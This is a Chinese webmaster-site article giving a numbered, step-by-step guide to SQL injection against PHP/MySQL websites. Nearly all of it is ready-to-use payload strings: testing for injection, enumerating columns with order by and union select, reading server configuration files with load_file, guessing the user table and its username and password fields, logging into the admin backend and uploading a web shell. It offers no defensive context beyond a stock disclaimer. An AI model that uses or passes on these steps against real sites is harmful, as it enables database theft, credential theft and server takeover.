17站长网

17站长网 首页 安全 脚本攻防 查看内容

php注入基本步骤小结

2022-9-26 14:43| 查看: 1596 |来源: 互联网

php注入十点基本步骤 1、判断是否存在注入,加'、and 1=1、and 1=2 2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询 3、利用order by 暴字段,在网址后加 order by 10/*
php注入十点基本步骤

1、判断是否存在注入,加'、and 1=1、and 1=2

2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询

3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于10

4、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。

(可在分别用user()、database()、version()进行替换报出的数字进而查看信息)

5、判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0/* 如果结果返回错误,那我们只能猜解管理员帐号和密码了。

6、如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。

7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,说明存在这个表。

8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按报出的数字进行替换

9、同理再猜解password字段,猜解成功再找后台登录。

10、登录后台,上传shell。

11、检测是不是root权限 and/**/ord(mid(user(),1,1))=114/*
本文最后更新于 2022-9-26 14:43,某些文章具有时效性,若有错误或已失效,请在网站留言或联系站长:17tui@17tui.com
·END·
站长网微信号:w17tui,关注站长、创业、关注互联网人 - 互联网创业者营销服务中心

免责声明:本站部分文章和图片均来自用户投稿和网络收集,旨在传播知识,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系我们及时修正或删除。谢谢!

17站长网微信二维码

始终以前瞻性的眼光聚焦站长、创业、互联网等领域,为您提供最新最全的互联网资讯,帮助站长转型升级,为互联网创业者提供更加优质的创业信息和品牌营销服务,与站长一起进步!让互联网创业者不再孤独!

扫一扫,关注站长网微信

大家都在看

    热门排行

      最近更新

        返回顶部